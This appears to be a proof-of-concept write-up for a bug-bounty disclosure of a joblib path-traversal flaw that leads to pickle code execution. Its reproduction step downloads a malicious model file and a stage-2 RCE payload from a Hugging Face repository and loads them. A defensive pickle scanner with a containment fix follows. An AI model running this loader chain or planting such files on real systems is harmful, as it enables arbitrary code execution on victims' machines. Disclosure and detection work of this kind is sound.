joblib NDArrayWrapper Path Traversal PoC

Security research PoC for huntr MFV submission.

Vulnerability: NDArrayWrapper.read() in joblib/numpy_pickle_compat.py uses the unsanitized self.filename field (taken from inside the pickle) in os.path.join(), then calls numpy.load(filename, allow_pickle=True). A path-traversal value in that field therefore turns into arbitrary pickle execution.

Affected version: joblib 1.5.3 (latest)

Files

  • evil.joblib: malicious model file (NDArrayWrapper with filename="../payload.npy")
  • payload.npy: stage-2 RCE pickle (place one directory above evil.joblib)

Reproduction

pip3 install joblib==1.5.3 numpy
python3 -c "
import os, joblib
from huggingface_hub import hf_hub_download
os.makedirs('/tmp/poc_model', exist_ok=True)
hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'payload.npy', local_dir='/tmp')
hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'evil.joblib', local_dir='/tmp/poc_model')
try: joblib.load('/tmp/poc_model/evil.joblib')
except: pass
print(open('/tmp/jl_rce_proof.txt').read().strip())
"
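As an added defensive check (not part of this PoC, and not joblib's own code), the following Python walks a model file's pickle opcode stream with pickletools without unpickling anything, flags a reference to joblib.numpy_pickle_compat.NDArrayWrapper, and reports any string constant that would resolve outside the model's directory when joined the way NDArrayWrapper.read() joins it. The sample bytes are hand-assembled here to mimic the structure described above (an NDArrayWrapper whose filename is ../payload.npy); they carry no second stage and are only parsed, never loaded. The model directory /srv/models/poc_model is an assumed placeholder, and the scanner assumes an uncompressed joblib file (the scan must be run on the decompressed stream otherwise).

```python
import os
import pickletools

# Module and class named on the page; the legacy reader that calls numpy.load.
NDARRAY_WRAPPER = ("joblib.numpy_pickle_compat", "NDArrayWrapper")

# Pickle opcodes that push a string constant onto the stack.
STRING_OPCODES = {
    "STRING", "BINSTRING", "SHORT_BINSTRING",
    "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
}

# Constructed fixture: opcode stream of an NDArrayWrapper whose state sets
# filename = "../payload.npy". It is hand-assembled, contains no payload,
# and is only ever parsed by pickletools, never passed to pickle.loads.
SAMPLE_PICKLE = (
    b"\x80\x02"                                       # PROTO 2
    b"cjoblib.numpy_pickle_compat\nNDArrayWrapper\n"  # GLOBAL module\nname\n
    b")\x81"                                          # EMPTY_TUPLE, NEWOBJ -> cls.__new__(cls)
    b"}"                                              # EMPTY_DICT (the state dict)
    b"X\x08\x00\x00\x00filename"                      # BINUNICODE "filename"
    b"X\x0e\x00\x00\x00../payload.npy"                # BINUNICODE "../payload.npy"
    b"s"                                              # SETITEM state["filename"] = "../payload.npy"
    b"b"                                              # BUILD   apply state to the object
    b"."                                              # STOP
)


def globals_and_strings(data):
    """Walk the opcode stream without executing it.

    Returns (globals, strings): the (module, name) pairs the pickle would
    import and every string constant it pushes. STACK_GLOBAL (protocol 4)
    takes its module and name from the two most recently pushed strings.
    """
    found_globals, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found_globals.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            found_globals.append((strings[-2], strings[-1]))
        elif opcode.name in STRING_OPCODES:
            strings.append(arg)
    return found_globals, strings


def escapes_directory(base_dir, filename):
    """True if os.path.join(base_dir, filename), once resolved, leaves base_dir.

    This is the containment check a loader should apply before handing the
    joined path to numpy.load: ".." segments and absolute names both fail it.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    return os.path.commonpath([base, target]) != base


def scan_pickle(data, model_dir):
    """Return human-readable findings for an uncompressed joblib/pickle stream."""
    findings = []
    found_globals, strings = globals_and_strings(data)
    if NDARRAY_WRAPPER in found_globals:
        findings.append("references %s.%s (legacy reader that calls numpy.load)"
                        % NDARRAY_WRAPPER)
    for s in strings:
        try:
            escapes = escapes_directory(model_dir, s)
        except ValueError:  # e.g. an embedded NUL byte; treat as hostile
            escapes = True
        if escapes:
            findings.append("string %r resolves outside %s" % (s, model_dir))
    return findings


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        path = sys.argv[1]
        with open(path, "rb") as fh:
            data = fh.read()
        model_dir = os.path.dirname(os.path.abspath(path))
    else:
        data, model_dir = SAMPLE_PICKLE, "/srv/models/poc_model"  # assumed placeholder
    for line in scan_pickle(data, model_dir):
        print("FINDING:", line)
```

Run without arguments to scan the built-in fixture, or pass a model file path; the scan only reads the opcode stream, so a hostile file is never deserialized. The containment check in escapes_directory is also the fix a loader would apply in front of numpy.load.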